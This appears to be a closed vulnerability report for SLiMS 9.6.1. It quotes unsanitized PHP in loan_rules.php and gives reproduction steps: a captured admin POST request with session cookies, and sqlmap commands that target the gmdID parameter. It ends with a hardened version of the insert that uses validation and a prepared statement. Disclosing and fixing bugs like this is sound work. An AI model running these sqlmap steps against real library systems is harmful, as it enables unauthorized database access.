Closed
Description
The bug
A SQL injection exists in admin/modules/circulation/loan_rules.php, in the code below. The POSTed values (memberTypeID, collTypeID, gmdID and the numeric fields) are copied into $data without validation or casting and handed straight to the insert:
```php
/* RECORD OPERATION */
if (isset($_POST['saveData'])) {
    $data['member_type_id'] = $_POST['memberTypeID'];
    $data['coll_type_id'] = $_POST['collTypeID'];
    $data['gmd_id'] = $_POST['gmdID'];
    $data['loan_limit'] = trim($_POST['loanLimit']);
    $data['loan_periode'] = trim($_POST['loanPeriode']);
    $data['reborrow_limit'] = trim($_POST['reborrowLimit']);
    $data['fine_each_day'] = trim($_POST['fineEachDay']);
    $data['grace_periode'] = trim($_POST['gracePeriode']);
    $data['input_date'] = date('Y-m-d');
    $data['last_update'] = date('Y-m-d');
    // create sql op object
    $sql_op = new simbio_dbop($dbs);
    if (isset($_POST['updateRecordID'])) {
        /* UPDATE RECORD MODE */
        // remove input date
        unset($data['input_date']);
        // filter update record ID
        $updateRecordID = (integer)$_POST['updateRecordID'];
        // update the data
        $update = $sql_op->update('mst_loan_rules', $data, 'loan_rules_id='.$updateRecordID);
        if ($update) {
            toastr(__('Loan Rules Successfully Updated'))->success();
            echo '<script language="Javascript">parent.jQuery(\'#mainContent\').simbioAJAX(parent.jQuery.ajaxHistory[0].url);</script>';
        } else { toastr(__('Loan Rules FAILED to Updated. Please Contact System Administrator')."\nDEBUG : ".$sql_op->error)->error(); }
        exit();
    } else {
        /* INSERT RECORD MODE */
        $insert = $sql_op->insert('mst_loan_rules', $data); // BUG HERE
        if ($insert) {
            toastr(__('New Loan Rules Successfully Saved'))->success();
            echo '<script language="Javascript">parent.jQuery(\'#mainContent\').simbioAJAX(\''.$_SERVER['PHP_SELF'].'\');</script>';
        } else { toastr(__('Loan Rules FAILED to Save. Please Contact System Administrator')."\n".$sql_op->error)->error(); }
        exit();
    }
    exit();
}
```

To Reproduce
Steps to reproduce the behavior:
- Login as admin or a user that has access to circulation
- Make sure Burp Suite is on to capture the request, such as the one below:
- Save the request into a file (example.req)
- Run the test with sqlmap with the command
  `sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql`
- Voila
example.req

```http
POST /slims9_bulian-9.6.1/admin/modules/circulation/loan_rules.php?action=detail&ajaxload=1 HTTP/1.1
Host: localhost
Content-Length: 1195
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypqBOyIslkQAaoPCi
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=circulation
Accept-Encoding: gzip, deflate
Accept-Language: id,en-US;q=0.9,en;q=0.8,ru;q=0.7
Cookie: SenayanAdmin=d79m01ubrn9d8cagafoflttg3m; admin_logged_in=1; SenayanMember=q0e3uf77qcmobchek4aciibpul; PHPSESSID=rh1hmcqfrm2a33e96b5lmtujn0
Connection: close

------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="csrf_token"

98420c7b2b5656890daf0f80b7756a6bb63fac37cb8ad1ac40a7b3ab4cde54c9
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="form_name"

mainForm
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="memberTypeID"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="collTypeID"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="gmdID"

0
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="loanLimit"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="loanPeriode"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="reborrowLimit"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="fineEachDay"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="gracePeriode"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="saveData"

Save
------WebKitFormBoundarypqBOyIslkQAaoPCi--
```
Screenshots
Proof of concept: current database
Command to run: `sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql --current-db`

Versions
- Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86_64)
- SLiMS version: slims9_bulian-9.6.1
Notes
Added a comment marking the bug. Last edit at 18 August 2023 21.12 GMT+7
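A hardened form of the insert path quoted under "The bug", added here as an example and not code from the SLiMS project: every loan-rule field is validated as a plain integer before any SQL is built, and the row is written with a prepared statement instead of a string-built query. It assumes `$dbs` is a mysqli connection and that the eight numeric columns of `mst_loan_rules` are integers (both assumptions; `validateLoanRuleInput`, `insertLoanRule` and `LOAN_RULE_FIELDS` are names chosen for this example).

```php
<?php
// Added example, not SLiMS project code: validate the loan-rule fields as typed
// integers before they reach any SQL builder, then bind them in a prepared
// statement. Assumes $dbs is a mysqli connection and that all eight numeric
// columns of mst_loan_rules are integers (adjust fine_each_day if it is decimal).

// POST field names from the report mapped to their mst_loan_rules columns.
const LOAN_RULE_FIELDS = [
    'memberTypeID'  => 'member_type_id',
    'collTypeID'    => 'coll_type_id',
    'gmdID'         => 'gmd_id',
    'loanLimit'     => 'loan_limit',
    'loanPeriode'   => 'loan_periode',
    'reborrowLimit' => 'reborrow_limit',
    'fineEachDay'   => 'fine_each_day',
    'gracePeriode'  => 'grace_periode',
];

// Returns the fields as integers, or null if any is not a plain non-negative
// integer: ctype_digit rejects quotes, spaces and operators before any SQL exists.
function validateLoanRuleInput(array $post): ?array
{
    $clean = [];
    foreach (LOAN_RULE_FIELDS as $postName => $column) {
        $raw = trim((string)($post[$postName] ?? ''));
        if ($raw === '' || !ctype_digit($raw)) {
            return null;
        }
        $clean[$column] = (int)$raw;
    }
    return $clean;
}

// Inserts with every value bound as an integer; user input never becomes SQL text.
function insertLoanRule(mysqli $dbs, array $clean): bool
{
    $stmt = $dbs->prepare(
        'INSERT INTO mst_loan_rules (member_type_id, coll_type_id, gmd_id, loan_limit, '
        . 'loan_periode, reborrow_limit, fine_each_day, grace_periode, input_date, last_update) '
        . 'VALUES (?, ?, ?, ?, ?, ?, ?, ?, CURDATE(), CURDATE())'
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('iiiiiiii', $clean['member_type_id'], $clean['coll_type_id'],
        $clean['gmd_id'], $clean['loan_limit'], $clean['loan_periode'],
        $clean['reborrow_limit'], $clean['fine_each_day'], $clean['grace_periode']);
    return $stmt->execute();
}
```

In the handler, call `validateLoanRuleInput($_POST)` first and reject the request (toastr error, then exit) when it returns null, so only the validated array ever reaches `insertLoanRule`; the update branch needs the same treatment for its fields, since only `updateRecordID` is cast there.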